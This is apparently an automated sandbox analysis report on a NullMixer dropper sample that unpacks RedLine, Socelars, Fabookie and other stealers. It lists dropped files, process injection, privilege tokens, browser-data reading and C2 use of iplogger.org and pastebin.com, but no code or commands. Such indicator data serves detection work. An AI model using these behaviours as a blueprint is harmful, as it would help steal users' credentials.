"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1724 set thread context of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2620 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2584 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
